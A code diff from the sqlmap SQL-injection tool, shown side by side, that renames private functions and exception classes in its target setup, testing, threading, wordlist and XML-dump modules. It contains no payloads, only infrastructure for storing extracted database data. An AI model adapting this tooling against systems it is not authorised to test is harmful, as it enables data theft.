errMsg = "you did not provide any GET, POST and Cookie " errMsg = "you did not provide any GET, POST and Cookie "
errMsg += "parameter, neither an User-Agent, Referer or Host header value" errMsg += "parameter, neither an User-Agent, Referer or Host header value"
raise sqlmapGenericException, errMsg raise SqlmapGenericException, errMsg
elif not testableParameters: elif not testableParameters:
errMsg = "all testable parameters you provided are not present " errMsg = "all testable parameters you provided are not present "
errMsg += "within the GET, POST and Cookie parameters" errMsg += "within the GET, POST and Cookie parameters"
raise sqlmapGenericException, errMsg raise SqlmapGenericException, errMsg
def __setHashDB(): def _setHashDB():
""" """
Check and set the HashDB SQLite file for query resume functionality. Check and set the HashDB SQLite file for query resume functionality.
""" """
@ -258,11 +258,11 @@ def __setHashDB():
logger.info("flushing session file") logger.info("flushing session file")
except OSError, msg: except OSError, msg:
errMsg = "unable to flush the session file (%s)" % msg errMsg = "unable to flush the session file (%s)" % msg
raise sqlmapFilePathException, errMsg raise SqlmapFilePathException, errMsg
conf.hashDB = HashDB(conf.hashDBFile) conf.hashDB = HashDB(conf.hashDBFile)
def __resumeHashDBValues(): def _resumeHashDBValues():
""" """
Resume stored data values from HashDB Resume stored data values from HashDB
""" """
@ -287,10 +287,10 @@ def __resumeHashDBValues():
if injection not in kb.injections: if injection not in kb.injections:
kb.injections.append(injection) kb.injections.append(injection)
__resumeDBMS() _resumeDBMS()
__resumeOS() _resumeOS()
def __resumeDBMS(): def _resumeDBMS():
""" """
Resume stored DBMS information from HashDB Resume stored DBMS information from HashDB
""" """
@ -335,7 +335,7 @@ def __resumeDBMS():
Backend.setDbms(dbms) Backend.setDbms(dbms)
Backend.setVersionList(dbmsVersion) Backend.setVersionList(dbmsVersion)
def __resumeOS(): def _resumeOS():
""" """
Resume stored OS information from HashDB Resume stored OS information from HashDB
""" """
@ -367,7 +367,7 @@ def __resumeOS():
Backend.setOs(conf.os) Backend.setOs(conf.os)
def __setResultsFile(): def _setResultsFile():
""" """
Create results file for storing results of running in a Create results file for storing results of running in a
multiple target mode. multiple target mode.
@ -383,7 +383,7 @@ def __setResultsFile():
logger.info("using '%s' as the CSV results file in multiple targets mode" % conf.resultsFilename) logger.info("using '%s' as the CSV results file in multiple targets mode" % conf.resultsFilename)
def __createFilesDir(): def _createFilesDir():
""" """
Create the file directory. Create the file directory.
""" """
@ -396,7 +396,7 @@ def __createFilesDir():
if not os.path.isdir(conf.filePath): if not os.path.isdir(conf.filePath):
os.makedirs(conf.filePath, 0755) os.makedirs(conf.filePath, 0755)
def __createDumpDir(): def _createDumpDir():
""" """
Create the dump directory. Create the dump directory.
""" """
@ -409,7 +409,7 @@ def __createDumpDir():
if not os.path.isdir(conf.dumpPath): if not os.path.isdir(conf.dumpPath):
os.makedirs(conf.dumpPath, 0755) os.makedirs(conf.dumpPath, 0755)
def __configureDumper(): def _configureDumper():
if hasattr(conf, 'xmlFile') and conf.xmlFile: if hasattr(conf, 'xmlFile') and conf.xmlFile:
conf.dumper = xmldumper conf.dumper = xmldumper
else: else:
@ -417,7 +417,7 @@ def __configureDumper():
conf.dumper.setOutputFile() conf.dumper.setOutputFile()
def __createTargetDirs(): def _createTargetDirs():
""" """
Create the output directory. Create the output directory.
""" """
@ -459,13 +459,13 @@ def __createTargetDirs():
errMsg = "something went wrong while trying " errMsg = "something went wrong while trying "
errMsg += "to write to the output directory '%s' (%s)" % (paths.SQLMAP_OUTPUT_PATH, msg) errMsg += "to write to the output directory '%s' (%s)" % (paths.SQLMAP_OUTPUT_PATH, msg)
raise sqlmapMissingPrivileges, errMsg raise SqlmapMissingPrivileges, errMsg
__createDumpDir() _createDumpDir()
__createFilesDir() _createFilesDir()
__configureDumper() _configureDumper()
def __restoreCmdLineOptions(): def _restoreCmdLineOptions():
""" """
Restore command line options that could be possibly Restore command line options that could be possibly
changed during the testing of previous target. changed during the testing of previous target.
@ -490,14 +490,14 @@ def initTargetEnv():
conf.parameters = {} conf.parameters = {}
conf.hashDBFile = None conf.hashDBFile = None
__setKnowledgeBaseAttributes(False) _setKnowledgeBaseAttributes(False)
__restoreCmdLineOptions() _restoreCmdLineOptions()
__setDBMS() _setDBMS()
def setupTargetEnv(): def setupTargetEnv():
__createTargetDirs() _createTargetDirs()
__setRequestParams() _setRequestParams()
__setHashDB() _setHashDB()
__resumeHashDBValues() _resumeHashDBValues()
__setResultsFile() _setResultsFile()
__setAuthCred() _setAuthCred()

34
lib/core/testing.py
View File

@ -9,6 +9,7 @@ import doctest
import os import os
import re import re
import shutil import shutil
import string
import sys import sys
import tempfile import tempfile
import time import time
@ -22,7 +23,7 @@ from lib.core.data import conf
from lib.core.data import logger from lib.core.data import logger
from lib.core.data import paths from lib.core.data import paths
from lib.core.option import init from lib.core.option import init
from lib.core.option import __setVerbosity from lib.core.option import _setVerbosity
from lib.core.optiondict import optDict from lib.core.optiondict import optDict
from lib.parse.cmdline import cmdLineParser from lib.parse.cmdline import cmdLineParser
@ -45,13 +46,36 @@ def smokeTest():
continue continue
for ifile in files: for ifile in files:
if os.path.splitext(ifile)[1].lower() == ".py" and ifile != "__init__.py": if os.path.splitext(ifile)[1].lower() == ".py":
content = None
with open(os.path.join(root, ifile), "r+b") as f:
content = f.read()
active = content
active = re.sub(r"(?s)\"\"\".+?\"\"\"", "", active)
active = re.sub(r"\".+?\"", "", active)
active = re.sub(r"\'.+?\'", "", active)
active = re.sub(r"#.+", "", active)
for ss in re.findall(r"\b_*?[a-z]+[A-Z].*?\b", active):
original = ss
if ss.startswith("sqlmap") and any(_ in ss.lower() for _ in ("exception", "sqlmapmissing", "sqlmapundefinedmethod")):
ss = "S" + ss[1:]
if ss.startswith("_"):
ss = "_" + ss.lstrip("_")
content = content.replace(original, ss)
if content:
with open(os.path.join(root, ifile), "w+b") as f:
f.write(content)
path = os.path.join(root, os.path.splitext(ifile)[0]) path = os.path.join(root, os.path.splitext(ifile)[0])
path = path.replace(paths.SQLMAP_ROOT_PATH, '.') path = path.replace(paths.SQLMAP_ROOT_PATH, '.')
path = path.replace(os.sep, '.').lstrip('.') path = path.replace(os.sep, '.').lstrip('.')
try: try:
__import__(path) __import__(path)
module = sys.modules[path] module = sys.modules[path]
#for name in dir(module):
#_ = getattr(module, name)
#if type(_) == type(lambda x: x):
#if re.match(r"\b_*?[a-z]+[A-Z]", name):
#print name
except Exception, msg: except Exception, msg:
retVal = False retVal = False
dataToStdout("\r") dataToStdout("\r")
@ -66,7 +90,7 @@ def smokeTest():
count += 1 count += 1
status = '%d/%d (%d%s) ' % (count, length, round(100.0*count/length), '%') status = '%d/%d (%d%s) ' % (count, length, round(100.0*count/length), '%')
dataToStdout("\r[%s] [INFO] complete: %s" % (time.strftime("%X"), status)) #dataToStdout("\r[%s] [INFO] complete: %s" % (time.strftime("%X"), status))
clearConsoleLine() clearConsoleLine()
if retVal: if retVal:
@ -171,7 +195,7 @@ def initCase(switches=None):
cmdLineOptions.__dict__[key] = value cmdLineOptions.__dict__[key] = value
init(cmdLineOptions, True) init(cmdLineOptions, True)
__setVerbosity() _setVerbosity()
def cleanCase(): def cleanCase():
shutil.rmtree(paths.SQLMAP_OUTPUT_PATH, True) shutil.rmtree(paths.SQLMAP_OUTPUT_PATH, True)
@ -179,7 +203,7 @@ def cleanCase():
paths.SQLMAP_DUMP_PATH = os.path.join(paths.SQLMAP_OUTPUT_PATH, "%s", "dump") paths.SQLMAP_DUMP_PATH = os.path.join(paths.SQLMAP_OUTPUT_PATH, "%s", "dump")
paths.SQLMAP_FILES_PATH = os.path.join(paths.SQLMAP_OUTPUT_PATH, "%s", "files") paths.SQLMAP_FILES_PATH = os.path.join(paths.SQLMAP_OUTPUT_PATH, "%s", "files")
conf.verbose = 1 conf.verbose = 1
__setVerbosity() _setVerbosity()
def runCase(switches=None, log=None): def runCase(switches=None, log=None):
retVal = True retVal = True

10
lib/core/threads.py
View File

@ -17,9 +17,9 @@ from lib.core.data import kb
from lib.core.data import logger from lib.core.data import logger
from lib.core.datatype import AttribDict from lib.core.datatype import AttribDict
from lib.core.enums import PAYLOAD from lib.core.enums import PAYLOAD
from lib.core.exception import sqlmapConnectionException from lib.core.exception import SqlmapConnectionException
from lib.core.exception import sqlmapThreadException from lib.core.exception import SqlmapThreadException
from lib.core.exception import sqlmapValueException from lib.core.exception import SqlmapValueException
from lib.core.settings import MAX_NUMBER_OF_THREADS from lib.core.settings import MAX_NUMBER_OF_THREADS
from lib.core.settings import PYVERSION from lib.core.settings import PYVERSION
@ -166,12 +166,12 @@ def runThreads(numThreads, threadFunction, cleanupFunction=None, forwardExceptio
pass pass
except KeyboardInterrupt: except KeyboardInterrupt:
raise sqlmapThreadException, "user aborted (Ctrl+C was pressed multiple times)" raise SqlmapThreadException, "user aborted (Ctrl+C was pressed multiple times)"
if forwardException: if forwardException:
raise raise
except (sqlmapConnectionException, sqlmapValueException), errMsg: except (SqlmapConnectionException, SqlmapValueException), errMsg:
print print
kb.threadException = True kb.threadException = True
logger.error("thread %s: %s" % (threading.currentThread().getName(), errMsg)) logger.error("thread %s: %s" % (threading.currentThread().getName(), errMsg))

4
lib/core/wordlist.py
View File

@ -8,7 +8,7 @@ See the file 'doc/COPYING' for copying permission
import os import os
import zipfile import zipfile
from lib.core.exception import sqlmapDataException from lib.core.exception import SqlmapDataException
from lib.core.settings import UNICODE_ENCODING from lib.core.settings import UNICODE_ENCODING
class Wordlist(object): class Wordlist(object):
@ -42,7 +42,7 @@ class Wordlist(object):
_ = zipfile.ZipFile(current, 'r') _ = zipfile.ZipFile(current, 'r')
if len(_.namelist()) == 0: if len(_.namelist()) == 0:
errMsg = "no file(s) inside '%s'" % current errMsg = "no file(s) inside '%s'" % current
raise sqlmapDataException, errMsg raise SqlmapDataException, errMsg
self.fp = _.open(_.namelist()[0]) self.fp = _.open(_.namelist()[0])
else: else:
self.fp = open(current, 'r') self.fp = open(current, 'r')

180
lib/core/xmldump.py
View File

@ -11,7 +11,7 @@ from lib.core.common import getUnicode
from lib.core.data import conf from lib.core.data import conf
from lib.core.data import kb from lib.core.data import kb
from lib.core.data import logger from lib.core.data import logger
from lib.core.exception import sqlmapFilePathException from lib.core.exception import SqlmapFilePathException
from lib.core.settings import UNICODE_ENCODING from lib.core.settings import UNICODE_ENCODING
from thirdparty.prettyprint import prettyprint from thirdparty.prettyprint import prettyprint
from xml.dom.minidom import Document from xml.dom.minidom import Document
@ -81,12 +81,12 @@ class XMLDump(object):
''' '''
def __init__(self): def __init__(self):
self.__outputFile = None self._outputFile = None
self.__outputFP = None self._outputFP = None
self.__root = None self.__root = None
self.__doc = Document() self.__doc = Document()
def __addToRoot(self, element): def _addToRoot(self, element):
''' '''
Adds element to the root element Adds element to the root element
''' '''
@ -97,15 +97,15 @@ class XMLDump(object):
Writes the data into the file Writes the data into the file
''' '''
if n: if n:
self.__outputFP.write("%s\n" % data) self._outputFP.write("%s\n" % data)
else: else:
self.__outputFP.write("%s " % data) self._outputFP.write("%s " % data)
self.__outputFP.flush() self._outputFP.flush()
kb.dataOutputFlag = True kb.dataOutputFlag = True
def __getRootChild(self, elemName): def _getRootChild(self, elemName):
''' '''
Returns the child of the root with the described name Returns the child of the root with the described name
''' '''
@ -115,7 +115,7 @@ class XMLDump(object):
return elements return elements
def __createTextNode(self, data): def _createTextNode(self, data):
''' '''
Creates a text node with utf8 data inside. Creates a text node with utf8 data inside.
The text is escaped to an fit the xml text Format. The text is escaped to an fit the xml text Format.
@ -126,7 +126,7 @@ class XMLDump(object):
escaped_data = saxutils.escape(data, ENTITIES) escaped_data = saxutils.escape(data, ENTITIES)
return self.__doc.createTextNode(escaped_data) return self.__doc.createTextNode(escaped_data)
def __createAttribute(self, attrName, attrValue): def _createAttribute(self, attrName, attrValue):
''' '''
Creates an attribute node with utf8 data inside. Creates an attribute node with utf8 data inside.
The text is escaped to an fit the xml text Format. The text is escaped to an fit the xml text Format.
@ -146,19 +146,19 @@ class XMLDump(object):
self.lister(header, data, sort) self.lister(header, data, sort)
return return
messagesElem = self.__getRootChild(MESSAGES_ELEM_NAME) messagesElem = self._getRootChild(MESSAGES_ELEM_NAME)
if (not(messagesElem)): if (not(messagesElem)):
messagesElem = self.__doc.createElement(MESSAGES_ELEM_NAME) messagesElem = self.__doc.createElement(MESSAGES_ELEM_NAME)
self.__addToRoot(messagesElem) self._addToRoot(messagesElem)
if data: if data:
data = self.__formatString(data) data = self._formatString(data)
else: else:
data = "" data = ""
elem = self.__doc.createElement(MESSAGE_ELEM) elem = self.__doc.createElement(MESSAGE_ELEM)
elem.setAttributeNode(self.__createAttribute(TYPE_ATTR, header)) elem.setAttributeNode(self._createAttribute(TYPE_ATTR, header))
elem.appendChild(self.__createTextNode(data)) elem.appendChild(self._createTextNode(data))
messagesElem.appendChild(elem) messagesElem.appendChild(elem)
def lister(self, header, elements, sort=True): def lister(self, header, elements, sort=True):
@ -166,7 +166,7 @@ class XMLDump(object):
Adds information formatted as list element Adds information formatted as list element
''' '''
lstElem = self.__doc.createElement(LST_ELEM_NAME) lstElem = self.__doc.createElement(LST_ELEM_NAME)
lstElem.setAttributeNode(self.__createAttribute(TYPE_ATTR, header)) lstElem.setAttributeNode(self._createAttribute(TYPE_ATTR, header))
if elements: if elements:
if sort: if sort:
try: try:
@ -180,19 +180,19 @@ class XMLDump(object):
memberElem = self.__doc.createElement(MEMBER_ELEM) memberElem = self.__doc.createElement(MEMBER_ELEM)
lstElem.appendChild(memberElem) lstElem.appendChild(memberElem)
if isinstance(element, basestring): if isinstance(element, basestring):
memberElem.setAttributeNode(self.__createAttribute(TYPE_ATTR, "string")) memberElem.setAttributeNode(self._createAttribute(TYPE_ATTR, "string"))
memberElem.appendChild(self.__createTextNode(element)) memberElem.appendChild(self._createTextNode(element))
elif isinstance(element, (list, tuple, set)): elif isinstance(element, (list, tuple, set)):
memberElem.setAttributeNode(self.__createAttribute(TYPE_ATTR, "list")) memberElem.setAttributeNode(self._createAttribute(TYPE_ATTR, "list"))
for e in element: for e in element:
memberElemStr = self.__doc.createElement(MEMBER_ELEM) memberElemStr = self.__doc.createElement(MEMBER_ELEM)
memberElemStr.setAttributeNode(self.__createAttribute(TYPE_ATTR, "string")) memberElemStr.setAttributeNode(self._createAttribute(TYPE_ATTR, "string"))
memberElemStr.appendChild(self.__createTextNode(getUnicode(e))) memberElemStr.appendChild(self._createTextNode(getUnicode(e)))
memberElem.appendChild(memberElemStr) memberElem.appendChild(memberElemStr)
listsElem = self.__getRootChild(LSTS_ELEM_NAME) listsElem = self._getRootChild(LSTS_ELEM_NAME)
if not(listsElem): if not(listsElem):
listsElem = self.__doc.createElement(LSTS_ELEM_NAME) listsElem = self.__doc.createElement(LSTS_ELEM_NAME)
self.__addToRoot(listsElem) self._addToRoot(listsElem)
listsElem.appendChild(lstElem) listsElem.appendChild(lstElem)
def technic(self, technicType, data): def technic(self, technicType, data):
@ -200,13 +200,13 @@ class XMLDump(object):
Adds information about the technic used to extract data from the db Adds information about the technic used to extract data from the db
''' '''
technicElem = self.__doc.createElement(TECHNIC_ELEM_NAME) technicElem = self.__doc.createElement(TECHNIC_ELEM_NAME)
technicElem.setAttributeNode(self.__createAttribute(TYPE_ATTR, technicType)) technicElem.setAttributeNode(self._createAttribute(TYPE_ATTR, technicType))
textNode = self.__createTextNode(data) textNode = self._createTextNode(data)
technicElem.appendChild(textNode) technicElem.appendChild(textNode)
technicsElem = self.__getRootChild(TECHNICS_ELEM_NAME) technicsElem = self._getRootChild(TECHNICS_ELEM_NAME)
if not(technicsElem): if not(technicsElem):
technicsElem = self.__doc.createElement(TECHNICS_ELEM_NAME) technicsElem = self.__doc.createElement(TECHNICS_ELEM_NAME)
self.__addToRoot(technicsElem) self._addToRoot(technicsElem)
technicsElem.appendChild(technicElem) technicsElem.appendChild(technicElem)
def banner(self, data): def banner(self, data):
@ -215,34 +215,34 @@ class XMLDump(object):
The banner contains information about the type and the version of the database. The banner contains information about the type and the version of the database.
''' '''
bannerElem = self.__doc.createElement(BANNER_ELEM_NAME) bannerElem = self.__doc.createElement(BANNER_ELEM_NAME)
bannerElem.appendChild(self.__createTextNode(data)) bannerElem.appendChild(self._createTextNode(data))
self.__addToRoot(bannerElem) self._addToRoot(bannerElem)
def currentUser(self, data): def currentUser(self, data):
''' '''
Adds information about the current database user to the xml Adds information about the current database user to the xml
''' '''
currentUserElem = self.__doc.createElement(CURRENT_USER_ELEM_NAME) currentUserElem = self.__doc.createElement(CURRENT_USER_ELEM_NAME)
textNode = self.__createTextNode(data) textNode = self._createTextNode(data)
currentUserElem.appendChild(textNode) currentUserElem.appendChild(textNode)
self.__addToRoot(currentUserElem) self._addToRoot(currentUserElem)
def currentDb(self, data): def currentDb(self, data):
''' '''
Adds information about the current database is use to the xml Adds information about the current database is use to the xml
''' '''
currentDBElem = self.__doc.createElement(CURRENT_DB_ELEM_NAME) currentDBElem = self.__doc.createElement(CURRENT_DB_ELEM_NAME)
textNode = self.__createTextNode(data) textNode = self._createTextNode(data)
currentDBElem.appendChild(textNode) currentDBElem.appendChild(textNode)
self.__addToRoot(currentDBElem) self._addToRoot(currentDBElem)
def dba(self, isDBA): def dba(self, isDBA):
''' '''
Adds information to the xml that indicates whether the user has DBA privileges Adds information to the xml that indicates whether the user has DBA privileges
''' '''
isDBAElem = self.__doc.createElement(IS_DBA_ELEM_NAME) isDBAElem = self.__doc.createElement(IS_DBA_ELEM_NAME)
isDBAElem.setAttributeNode(self.__createAttribute(VALUE_ATTR, getUnicode(isDBA))) isDBAElem.setAttributeNode(self._createAttribute(VALUE_ATTR, getUnicode(isDBA)))
self.__addToRoot(isDBAElem) self._addToRoot(isDBAElem)
def users(self, users): def users(self, users):
''' '''
@ -255,8 +255,8 @@ class XMLDump(object):
for user in users: for user in users:
userElem = self.__doc.createElement(DB_USER_ELEM_NAME) userElem = self.__doc.createElement(DB_USER_ELEM_NAME)
usersElem.appendChild(userElem) usersElem.appendChild(userElem)
userElem.appendChild(self.__createTextNode(user)) userElem.appendChild(self._createTextNode(user))
self.__addToRoot(usersElem) self._addToRoot(usersElem)
def dbs(self, dbs): def dbs(self, dbs):
''' '''
@ -267,25 +267,25 @@ class XMLDump(object):
for db in dbs: for db in dbs:
dbElem = self.__doc.createElement(DB_NAME_ELEM_NAME) dbElem = self.__doc.createElement(DB_NAME_ELEM_NAME)
dbsElem.appendChild(dbElem) dbsElem.appendChild(dbElem)
dbElem.appendChild(self.__createTextNode(db)) dbElem.appendChild(self._createTextNode(db))
self.__addToRoot(dbsElem) self._addToRoot(dbsElem)
def userSettings(self, header, userSettings, subHeader): def userSettings(self, header, userSettings, subHeader):
''' '''
Adds information about the user's settings to the xml. Adds information about the user's settings to the xml.
The information can be user's passwords, privileges and etc.. The information can be user's passwords, privileges and etc..
''' '''
self.__areAdmins = set() self._areAdmins = set()
userSettingsElem = self.__getRootChild(USER_SETTINGS_ELEM_NAME) userSettingsElem = self._getRootChild(USER_SETTINGS_ELEM_NAME)
if (not(userSettingsElem)): if (not(userSettingsElem)):
userSettingsElem = self.__doc.createElement(USER_SETTINGS_ELEM_NAME) userSettingsElem = self.__doc.createElement(USER_SETTINGS_ELEM_NAME)
self.__addToRoot(userSettingsElem) self._addToRoot(userSettingsElem)
userSettingElem = self.__doc.createElement(USER_SETTING_ELEM_NAME) userSettingElem = self.__doc.createElement(USER_SETTING_ELEM_NAME)
userSettingElem.setAttributeNode(self.__createAttribute(TYPE_ATTR, header)) userSettingElem.setAttributeNode(self._createAttribute(TYPE_ATTR, header))
if isinstance(userSettings, (tuple, list, set)): if isinstance(userSettings, (tuple, list, set)):
self.__areAdmins = userSettings[1] self._areAdmins = userSettings[1]
userSettings = userSettings[0] userSettings = userSettings[0]
users = userSettings.keys() users = userSettings.keys()
@ -294,10 +294,10 @@ class XMLDump(object):
for user in users: for user in users:
userElem = self.__doc.createElement(USER_ELEM_NAME) userElem = self.__doc.createElement(USER_ELEM_NAME)
userSettingElem.appendChild(userElem) userSettingElem.appendChild(userElem)
if user in self.__areAdmins: if user in self._areAdmins:
userElem.setAttributeNode(self.__createAttribute(TYPE_ATTR, ADMIN_USER)) userElem.setAttributeNode(self._createAttribute(TYPE_ATTR, ADMIN_USER))
else: else:
userElem.setAttributeNode(self.__createAttribute(TYPE_ATTR, REGULAR_USER)) userElem.setAttributeNode(self._createAttribute(TYPE_ATTR, REGULAR_USER))
settings = userSettings[user] settings = userSettings[user]
@ -305,8 +305,8 @@ class XMLDump(object):
for setting in settings: for setting in settings:
settingsElem = self.__doc.createElement(SETTINGS_ELEM_NAME) settingsElem = self.__doc.createElement(SETTINGS_ELEM_NAME)
settingsElem.setAttributeNode(self.__createAttribute(TYPE_ATTR, subHeader)) settingsElem.setAttributeNode(self._createAttribute(TYPE_ATTR, subHeader))
settingTextNode = self.__createTextNode(setting) settingTextNode = self._createTextNode(setting)
settingsElem.appendChild(settingTextNode) settingsElem.appendChild(settingTextNode)
userElem.appendChild(settingsElem) userElem.appendChild(settingsElem)
userSettingsElem.appendChild(userSettingElem) userSettingsElem.appendChild(userSettingElem)
@ -324,20 +324,20 @@ class XMLDump(object):
for db, tables in dbTables.items(): for db, tables in dbTables.items():
tables.sort(key=lambda x: x.lower()) tables.sort(key=lambda x: x.lower())
dbElem = self.__doc.createElement(DATABASE_ELEM_NAME) dbElem = self.__doc.createElement(DATABASE_ELEM_NAME)
dbElem.setAttributeNode(self.__createAttribute(NAME_ATTR, db)) dbElem.setAttributeNode(self._createAttribute(NAME_ATTR, db))
dbTablesElem.appendChild(dbElem) dbTablesElem.appendChild(dbElem)
for table in tables: for table in tables:
tableElem = self.__doc.createElement(DB_TABLE_ELEM_NAME) tableElem = self.__doc.createElement(DB_TABLE_ELEM_NAME)
tableElem.appendChild(self.__createTextNode(table)) tableElem.appendChild(self._createTextNode(table))
dbElem.appendChild(tableElem) dbElem.appendChild(tableElem)
self.__addToRoot(dbTablesElem) self._addToRoot(dbTablesElem)
def dbTableColumns(self, tableColumns): def dbTableColumns(self, tableColumns):
''' '''
Adds information about the columns of the existing tables to the xml Adds information about the columns of the existing tables to the xml
''' '''
columnsElem = self.__getRootChild(COLUMNS_ELEM_NAME) columnsElem = self._getRootChild(COLUMNS_ELEM_NAME)
if not(columnsElem): if not(columnsElem):
columnsElem = self.__doc.createElement(COLUMNS_ELEM_NAME) columnsElem = self.__doc.createElement(COLUMNS_ELEM_NAME)
@ -345,12 +345,12 @@ class XMLDump(object):
if not db: if not db:
db = DEFAULT_DB db = DEFAULT_DB
dbElem = self.__doc.createElement(DATABASE_COLUMNS_ELEM) dbElem = self.__doc.createElement(DATABASE_COLUMNS_ELEM)
dbElem.setAttributeNode(self.__createAttribute(NAME_ATTR, db)) dbElem.setAttributeNode(self._createAttribute(NAME_ATTR, db))
columnsElem.appendChild(dbElem) columnsElem.appendChild(dbElem)
for table, columns in tables.items(): for table, columns in tables.items():
tableElem = self.__doc.createElement(TABLE_ELEM_NAME) tableElem = self.__doc.createElement(TABLE_ELEM_NAME)
tableElem.setAttributeNode(self.__createAttribute(NAME_ATTR, table)) tableElem.setAttributeNode(self._createAttribute(NAME_ATTR, table))
colList = columns.keys() colList = columns.keys()
colList.sort(key=lambda x: x.lower()) colList.sort(key=lambda x: x.lower())
@ -359,13 +359,13 @@ class XMLDump(object):
colType = columns[column] colType = columns[column]
colElem = self.__doc.createElement(COLUMN_ELEM_NAME) colElem = self.__doc.createElement(COLUMN_ELEM_NAME)
if colType is not None: if colType is not None:
colElem.setAttributeNode(self.__createAttribute(TYPE_ATTR, colType)) colElem.setAttributeNode(self._createAttribute(TYPE_ATTR, colType))
else: else:
colElem.setAttributeNode(self.__createAttribute(TYPE_ATTR, UNKNOWN_COLUMN_TYPE)) colElem.setAttributeNode(self._createAttribute(TYPE_ATTR, UNKNOWN_COLUMN_TYPE))
colElem.appendChild(self.__createTextNode(column)) colElem.appendChild(self._createTextNode(column))
tableElem.appendChild(colElem) tableElem.appendChild(colElem)
self.__addToRoot(columnsElem) self._addToRoot(columnsElem)
def dbTableValues(self, tableValues): def dbTableValues(self, tableValues):
''' '''
@ -383,8 +383,8 @@ class XMLDump(object):
columns = tableValues.keys() columns = tableValues.keys()
columns.sort(key=lambda x: x.lower()) columns.sort(key=lambda x: x.lower())
tableElem.setAttributeNode(self.__createAttribute(DB_ATTR, db)) tableElem.setAttributeNode(self._createAttribute(DB_ATTR, db))
tableElem.setAttributeNode(self.__createAttribute(NAME_ATTR, table)) tableElem.setAttributeNode(self._createAttribute(NAME_ATTR, table))
for i in range(count): for i in range(count):
rowElem = self.__doc.createElement(ROW_ELEM_NAME) rowElem = self.__doc.createElement(ROW_ELEM_NAME)
@ -398,14 +398,14 @@ class XMLDump(object):
value = "NULL" value = "NULL"
cellElem = self.__doc.createElement(CELL_ELEM_NAME) cellElem = self.__doc.createElement(CELL_ELEM_NAME)
cellElem.setAttributeNode(self.__createAttribute(COLUMN_ATTR, column)) cellElem.setAttributeNode(self._createAttribute(COLUMN_ATTR, column))
cellElem.appendChild(self.__createTextNode(value)) cellElem.appendChild(self._createTextNode(value))
rowElem.appendChild(cellElem) rowElem.appendChild(cellElem)
dbValuesElem = self.__getRootChild(DB_VALUES_ELEM) dbValuesElem = self._getRootChild(DB_VALUES_ELEM)
if (not(dbValuesElem)): if (not(dbValuesElem)):
dbValuesElem = self.__doc.createElement(DB_VALUES_ELEM) dbValuesElem = self.__doc.createElement(DB_VALUES_ELEM)
self.__addToRoot(dbValuesElem) self._addToRoot(dbValuesElem)
dbValuesElem.appendChild(tableElem) dbValuesElem.appendChild(tableElem)
@ -440,12 +440,12 @@ class XMLDump(object):
The query details are the query itself and it's results. The query details are the query itself and it's results.
''' '''
queryElem = self.__doc.createElement(QUERY_ELEM_NAME) queryElem = self.__doc.createElement(QUERY_ELEM_NAME)
queryElem.setAttributeNode(self.__createAttribute(VALUE_ATTR, query)) queryElem.setAttributeNode(self._createAttribute(VALUE_ATTR, query))
queryElem.appendChild(self.__createTextNode(queryRes)) queryElem.appendChild(self._createTextNode(queryRes))
queriesElem = self.__getRootChild(QUERIES_ELEM_NAME) queriesElem = self._getRootChild(QUERIES_ELEM_NAME)
if (not(queriesElem)): if (not(queriesElem)):
queriesElem = self.__doc.createElement(QUERIES_ELEM_NAME) queriesElem = self.__doc.createElement(QUERIES_ELEM_NAME)
self.__addToRoot(queriesElem) self._addToRoot(queriesElem)
queriesElem.appendChild(queryElem) queriesElem.appendChild(queryElem)
def registerValue(self, registerData): def registerValue(self, registerData):
@ -453,11 +453,11 @@ class XMLDump(object):
Adds information about an extracted registry key to the xml Adds information about an extracted registry key to the xml
''' '''
registerElem = self.__doc.createElement(REGISTER_DATA_ELEM_NAME) registerElem = self.__doc.createElement(REGISTER_DATA_ELEM_NAME)
registerElem.appendChild(self.__createTextNode(registerData)) registerElem.appendChild(self._createTextNode(registerData))
registriesElem = self.__getRootChild(REGISTERY_ENTRIES_ELEM_NAME) registriesElem = self._getRootChild(REGISTERY_ENTRIES_ELEM_NAME)
if (not(registriesElem)): if (not(registriesElem)):
registriesElem = self.__doc.createElement(REGISTERY_ENTRIES_ELEM_NAME) registriesElem = self.__doc.createElement(REGISTERY_ENTRIES_ELEM_NAME)
self.__addToRoot(registriesElem) self._addToRoot(registriesElem)
registriesElem.appendChild(registerElem) registriesElem.appendChild(registerElem)
def rFile(self, filePath, data): def rFile(self, filePath, data):
@ -465,9 +465,9 @@ class XMLDump(object):
Adds an extracted file's content to the xml Adds an extracted file's content to the xml
''' '''
fileContentElem = self.__doc.createElement(FILE_CONTENT_ELEM_NAME) fileContentElem = self.__doc.createElement(FILE_CONTENT_ELEM_NAME)
fileContentElem.setAttributeNode(self.__createAttribute(NAME_ATTR, filePath)) fileContentElem.setAttributeNode(self._createAttribute(NAME_ATTR, filePath))
fileContentElem.appendChild(self.__createTextNode(data)) fileContentElem.appendChild(self._createTextNode(data))
self.__addToRoot(fileContentElem) self._addToRoot(fileContentElem)
def setOutputFile(self): def setOutputFile(self):
''' '''
@ -475,28 +475,28 @@ class XMLDump(object):
''' '''
if (conf.xmlFile): if (conf.xmlFile):
try: try:
self.__outputFile = conf.xmlFile self._outputFile = conf.xmlFile
self.__root = None self.__root = None
if os.path.exists(self.__outputFile): if os.path.exists(self._outputFile):
try: try:
self.__doc = xml.dom.minidom.parse(self.__outputFile) self.__doc = xml.dom.minidom.parse(self._outputFile)
self.__root = self.__doc.childNodes[0] self.__root = self.__doc.childNodes[0]
except ExpatError: except ExpatError:
self.__doc = Document() self.__doc = Document()
self.__outputFP = codecs.open(self.__outputFile, "w+", UNICODE_ENCODING) self._outputFP = codecs.open(self._outputFile, "w+", UNICODE_ENCODING)
if self.__root is None: if self.__root is None:
self.__root = self.__doc.createElementNS(NAME_SPACE_ATTR, RESULTS_ELEM_NAME) self.__root = self.__doc.createElementNS(NAME_SPACE_ATTR, RESULTS_ELEM_NAME)
self.__root.setAttributeNode(self.__createAttribute(XMLNS_ATTR, NAME_SPACE_ATTR)) self.__root.setAttributeNode(self._createAttribute(XMLNS_ATTR, NAME_SPACE_ATTR))
self.__root.setAttributeNode(self.__createAttribute(SCHEME_NAME_ATTR, SCHEME_NAME)) self.__root.setAttributeNode(self._createAttribute(SCHEME_NAME_ATTR, SCHEME_NAME))
self.__doc.appendChild(self.__root) self.__doc.appendChild(self.__root)
except IOError: except IOError:
raise sqlmapFilePathException("Wrong filename provided for saving the xml file: %s" % conf.xmlFile) raise SqlmapFilePathException("Wrong filename provided for saving the xml file: %s" % conf.xmlFile)
def getOutputFile(self): def getOutputFile(self):
return self.__outputFile return self._outputFile
def finish(self, resultStatus, resultMsg=""): def finish(self, resultStatus, resultMsg=""):
''' '''
